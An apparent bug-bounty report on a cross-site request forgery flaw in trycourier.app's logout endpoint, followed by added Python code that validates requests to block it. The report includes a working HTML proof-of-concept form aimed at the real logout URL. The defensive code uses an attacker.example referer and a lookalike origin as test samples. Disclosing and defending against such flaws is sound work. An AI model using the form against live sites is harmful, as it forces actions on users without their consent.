Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated. … If the victim is an administrative account, CSRF can compromise the entire web application.
1. Create a CSRF logout PoC using the following code.
Code that I use:
<html>
<body>
<!-- Rewrites the address bar to "/" so the page's real URL is hidden from the victim -->
<script>history.pushState('', '', '/')</script>
<!-- No method attribute, so the browser submits a plain GET to the logout endpoint -->
<form action="https://www.trycourier.app/logout">
<input type="submit" value="Submit request" />
</form>
</body>
</html>
I have provided an attack scenario for it, please check it.
Log out any victim into the attacker account: send the HTML made by the attacker and then log him out of the session.
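The defensive side of this report, added here as an example that is not part of the original submission: a server-side check that rejects the GET form above and accepts a logout only as a POST from the site's own origin carrying a session-bound token. The `Request` model, the helper names and every sample request are constructed for the example; only the origin comes from the PoC.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlsplit

SITE_ORIGIN = "https://www.trycourier.app"  # origin of the logout endpoint in the PoC

@dataclass
class Request:
    """Minimal model of an incoming HTTP request (constructed for this example)."""
    method: str
    headers: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)

def issue_csrf_token(session: dict) -> str:
    """Bind a fresh random token to the server-side session (synchronizer token pattern)."""
    session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]

def same_origin(url: str) -> bool:
    """Exact scheme://host[:port] match, so a lookalike host cannot pass a prefix test."""
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}" == SITE_ORIGIN

def logout_allowed(req: Request, session: dict) -> tuple:
    """Return (allowed, reason). Each layer alone stops the PoC; together they also
    cover older browsers that send no Sec-Fetch-Site header."""
    if req.method.upper() != "POST":  # a <form> with no method submits a GET
        return False, "method"
    fetch_site = req.headers.get("Sec-Fetch-Site")
    if fetch_site is not None and fetch_site != "same-origin":
        return False, "sec-fetch-site"
    if not same_origin(req.headers.get("Origin") or req.headers.get("Referer", "")):
        return False, "origin"
    expected, supplied = session.get("csrf_token"), req.form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False, "token"  # constant-time compare against the session-bound token
    return True, "ok"

def demo() -> dict:
    """Replay the PoC's request and two constructed variants against the check."""
    session = {}
    token = issue_csrf_token(session)
    requests = {  # constructed samples: the PoC form, a real logout, a lookalike origin
        "poc": Request("GET", {"Referer": "https://attacker.example/", "Sec-Fetch-Site": "cross-site"}),
        "legit": Request("POST", {"Origin": SITE_ORIGIN, "Sec-Fetch-Site": "same-origin"}, {"csrf_token": token}),
        "lookalike": Request("POST", {"Origin": "https://www.trycourier.app.attacker.example"}, {"csrf_token": token}),
    }
    return {name: logout_allowed(req, session) for name, req in requests.items()}
```

The `lookalike` case deliberately omits `Sec-Fetch-Site` to show that the origin comparison, not only the fetch-metadata check, refuses it.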
The hacker selected the Cross-Site Request Forgery (CSRF) weakness. This vulnerability type requires contextual information from the hacker.